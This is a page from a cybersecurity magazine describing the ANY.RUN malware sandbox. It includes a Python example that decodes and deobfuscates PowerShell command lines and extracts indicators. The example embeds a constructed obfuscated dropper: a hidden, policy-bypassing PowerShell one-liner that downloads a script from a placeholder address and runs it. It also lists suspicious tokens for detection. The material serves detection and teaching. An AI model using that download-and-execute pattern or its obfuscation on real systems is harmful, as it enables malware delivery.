Page 183 - Cyber Defense eMagazine June 2024
Deobfuscated PowerShell script displayed by the sandbox
Interactive sandboxes like ANY.RUN not only detect scripts (JScript, VBA, VBScript) executed during the
analysis but also provide a detailed breakdown of their functions, inputs, and outputs. The same applies
to PowerShell scripts, which ranked as the fourth most prevalent TTP in Q1 2024. An interactive sandbox
simplifies their analysis by presenting a deobfuscated variant of the script, giving a clearer view of its
purpose.
Interactive Malware Analysis with ANY.RUN
ANY.RUN is a cloud-based sandbox designed for interactive analysis. Because the virtual machines are
exposed over VNC, users have full control of the Windows and Linux VMs and can interact with the system
directly.
On average, the sandbox detects threats in under 40 seconds and extracts indicators of compromise as
well as malware configurations for both emerging and long-established malware families.
The service comes equipped with advanced tools for network, registry, and process analysis. It
automatically maps the observed malicious behavior to MITRE ATT&CK techniques and generates a
downloadable report of the findings collected during the analysis.
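The two capabilities described on this page, presenting a deobfuscated PowerShell script and extracting indicators of compromise from it, can be reproduced in miniature with a short static pass. The Python below is an added example written for this page, not ANY.RUN's code: it decodes a -EncodedCommand payload (UTF-16LE wrapped in Base64), folds three obfuscation patterns commonly seen in droppers ([char] concatenation, string reversal with [-1..-N] -join '', and string concatenation with +), and then pulls URLs and IPv4 addresses out of the cleaned script. The sample command line, the 198.51.100.23 address (from the TEST-NET-2 documentation range) and the loader.ps1 name are constructed for the example.

```python
import base64
import re
from typing import Optional

# Constructed sample script, shaped like a phishing dropper one-liner.
# The IP address and file name are placeholders invented for this example.
PLAIN_SCRIPT = (
    "$u = 'http://198.51.100.23/'+'loader'+'.ps1';"
    "$m = [char]73+[char]69+[char]88;"                # folds to 'IEX'
    "$n = 'tneilCbeW.teN'[-1..-13] -join '';"          # folds to 'Net.WebClient'
    "& $m (New-Object $n).DownloadString($u)"
)


def encode_command(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects:
    UTF-16LE bytes, then Base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed command line as it would appear in a process-creation event.
SAMPLE_CMDLINE = (
    "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -EncodedCommand "
    + encode_command(PLAIN_SCRIPT)
)

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENC_RE = re.compile(r"-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script hidden behind -EncodedCommand, or None if absent/invalid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    b64 = m.group(1)
    b64 += "=" * (-len(b64) % 4)  # tolerate stripped Base64 padding
    try:
        return base64.b64decode(b64).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


# Obfuscation patterns this static pass knows how to fold.
CHAR_RE = re.compile(r"\[char\]\s*(\d+)", re.I)
CHAR_CONCAT_RE = re.compile(r"(?:\[char\]\s*\d+\s*\+\s*)*\[char\]\s*\d+", re.I)
REVERSE_RE = re.compile(r"'([^']*)'\[-1\.\.-(\d+)\]\s*-join\s*''")
CONCAT_RE = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")


def fold_char_casts(script: str) -> str:
    """[char]73+[char]69+[char]88 -> 'IEX'."""
    def repl(m):
        return "'" + "".join(chr(int(n)) for n in CHAR_RE.findall(m.group(0))) + "'"
    return CHAR_CONCAT_RE.sub(repl, script)


def fold_reversals(script: str) -> str:
    """'cba'[-1..-3] -join '' -> 'abc' (only full-length reversals are folded)."""
    def repl(m):
        text, n = m.group(1), int(m.group(2))
        return "'" + text[::-1] + "'" if n == len(text) else m.group(0)
    return REVERSE_RE.sub(repl, script)


def fold_concats(script: str) -> str:
    """'a'+'b' -> 'ab', repeated until no adjacent literal pairs remain."""
    prev = None
    while prev != script:
        prev = script
        script = CONCAT_RE.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", script)
    return script


def deobfuscate(script: str) -> str:
    """Apply every fold until the script stops changing."""
    prev = None
    while prev != script:
        prev = script
        script = fold_concats(fold_reversals(fold_char_casts(script)))
    return script


URL_RE = re.compile(r"https?://[^\s'\"()]+")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def extract_iocs(script: str) -> dict:
    """Pull network indicators out of a (deobfuscated) script."""
    return {"urls": sorted(set(URL_RE.findall(script))),
            "ipv4": sorted(set(IPV4_RE.findall(script)))}


# Tokens worth flagging once the script is readable.
SUSPICIOUS = ("IEX", "Invoke-Expression", "DownloadString", "DownloadFile",
              "Net.WebClient", "-Exec Bypass", "Hidden", "FromBase64String")


def analyse(cmdline: str) -> dict:
    """Decode, deobfuscate and summarise one PowerShell command line."""
    decoded = decode_encoded_command(cmdline) or cmdline
    clean = deobfuscate(decoded)
    haystack = (clean + " " + cmdline).lower()
    return {"decoded": decoded, "deobfuscated": clean,
            "iocs": extract_iocs(clean),
            "indicators": [t for t in SUSPICIOUS if t.lower() in haystack]}


if __name__ == "__main__":
    for key, value in analyse(SAMPLE_CMDLINE).items():
        print(f"{key}: {value}")
```

Note that none of the flagged tokens (IEX, Net.WebClient, the URL) are visible in the raw command line or even in the decoded script; they only appear after folding, which is why sandbox reports show the deobfuscated form. This regex pass handles only the three literal patterns above; a sandbox instead executes the script on an instrumented host and records what is actually invoked, so it survives obfuscations a static pass does not.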
Copyright © 2024, Cyber Defense Magazine. All rights reserved worldwide.